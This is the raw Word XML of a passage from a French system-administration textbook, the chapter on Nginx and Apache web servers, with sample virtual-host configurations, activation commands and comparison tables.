      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche toute connexion directe en root.</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Le serveur a refusé toutes les clés proposées.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crée un transfert distant vers le poste local.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>60. Serveurs web : Nginx et Apache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Servir des sites statiques et proxyfier des applications, avec une configuration lisible et vérifiée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 59</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Choisir entre serveur statique, proxy inverse et application.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Écrire une configuration Nginx structurée.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Comprendre les blocs Apache et les fichiers </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.htaccess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Configurer journaux, en-têtes et sécurité de base.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Diagnostiquer une erreur 502 ou 403.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>60.1 Trois rôles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur web peut servir des fichiers, relayer des requêtes vers une application, ou assurer les deux. Distinguer ces rôles évite les configurations confuses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.212 — Quatre rôles et leur responsabilité</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7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319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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serveur statique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTML, CSS, images</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Fichiers et en-têtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Proxy inverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Nginx → Node.js</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Routage, TLS, limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équilibreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nginx → trois applications</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Répartition et santé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Serveur d'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Node, Gunicorn, PHP-FPM</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Logique métier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="72" name="Picture 72"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f70.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.70 — Nginx devant une application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>60.2 Nginx : une configuration par blocs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nginx organise sa configuration en contexte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par site, puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par chemin. La directive la plus spécifique l'emporte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une configuration complète · nginx</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/etc/nginx/sites-available/exemple.fr</w:t>
        <w:br/>
        <w:t>server {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    listen 443 ssl;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http2 on;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server_name exemple.fr www.exemple.fr;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate     /etc/letsencrypt/live/exemple.fr/fullchain.pem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_certificate_key /etc/letsencrypt/live/exemple.fr/privkey.pem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ssl_protocols TLSv1.2 TLSv1.3;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    root /var/www/exemple;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    index index.html;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    access_log /var/log/nginx/exemple.access.log;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    error_log  /var/log/nginx/exemple.error.log warn;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # Statique : cache long grâce à l'empreinte dans le nom</w:t>
        <w:br/>
        <w:t xml:space="preserve">    location ~* \.(css|js|woff2|avif|webp)$ {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        expires 1y;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        add_header Cache-Control "public, immutable";</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try_files $uri =404;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # Application derrière un proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">    location /api/ {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        proxy_pass http://127.0.0.1:3000/;</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proxy_read_timeout 30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    # Page unique : tout retombe sur index.html</w:t>
        <w:br/>
        <w:t xml:space="preserve">    location / {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try_files $uri $uri/ /index.html;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre étapes, une vérification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Activer le site et vérifier</w:t>
        <w:br/>
        <w:t>ln -s /etc/nginx/sites-available/exemple.fr /etc/nginx/sites-enabled/</w:t>
        <w:br/>
        <w:t>rm /etc/nginx/sites-enabled/default</w:t>
        <w:br/>
        <w:br/>
        <w:t>nginx -t</w:t>
        <w:br/>
        <w:t>systemctl reload nginx</w:t>
        <w:br/>
        <w:t>nginx -T | less        # configuration complète effective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.213 — Cinq directives à connaître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91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Directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>root</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Répertoire des fichiers</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Doit exister et être lisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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try_files</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Ordre de recherche</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Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>=404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> final évite le listage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>proxy_pass</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Destination</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La barre finale change le chemin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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expires</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Cache navigateur</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Inutile sans nom versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>client_max_body_size</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Taille maximale</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1 Mo par défaut</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LA BARRE OBLIQUE DE `PROXY_PASS`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>proxy_pass http://127.0.0.1:3000/;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (avec barre) remplace le préfixe correspondant ; sans barre, il conserve le chemin complet. Cette différence explique de nombreuses erreurs 404 difficiles à voir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">60.3 Apache : modules et fichiers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache utilise une architecture de modules et des fichiers de configuration par répertoire. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de modifier la configuration sans accès root, au prix de performances et de lisibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un hôte virtuel complet · apache</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&lt;VirtualHost *:443&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ServerName exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ServerAlias www.exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">    DocumentRoot /var/www/exemple</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    SSLEngine on</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SSLCertificateFile      /etc/letsencrypt/live/exemple.fr/fullchain.pem</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SSLCertificateKeyFile   /etc/letsencrypt/live/exemple.fr/privkey.pem</w:t>
        <w:br/>
        <w:t xml:space="preserve">    SSLProtocol             all -SSLv3 -TLSv1 -TLSv1.1</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    &lt;Directory /var/www/exemple&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Options -Indexes +FollowSymLinks</w:t>
        <w:br/>
        <w:t xml:space="preserve">        AllowOverride All</w:t>
        <w:br/>
        <w:t xml:space="preserve">        Require all granted</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/Directory&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    ProxyPreserveHost On</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ProxyPass        /api/ http://127.0.0.1:3000/api/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ProxyPassReverse /api/ http://127.0.0.1:3000/api/</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    ErrorLog  ${APACHE_LOG_DIR}/exemple.error.log</w:t>
        <w:br/>
        <w:t xml:space="preserve">    CustomLog ${APACHE_LOG_DIR}/exemple.access.log combined</w:t>
        <w:br/>
        <w:t>&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq commandes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Modules nécessaires</w:t>
        <w:br/>
        <w:t>a2enmod ssl proxy proxy_http headers rewrite http2</w:t>
        <w:br/>
        <w:t>a2ensite exemple.fr</w:t>
        <w:br/>
        <w:t>apachectl configtest</w:t>
        <w:br/>
        <w:t>systemctl reload apache2</w:t>
        <w:br/>
        <w:br/>
        <w:t># .htaccess minimal</w:t>
        <w:br/>
        <w:t>RewriteEngine On</w:t>
        <w:br/>
        <w:t>RewriteCond %{HTTPS} off</w:t>
        <w:br/>
        <w:t>RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.214 — Cinq critères de comparaison</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7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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Événementiel</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Processus par connexion (MPM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Fichiers centralisés</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.htaccess</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Proxy inverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
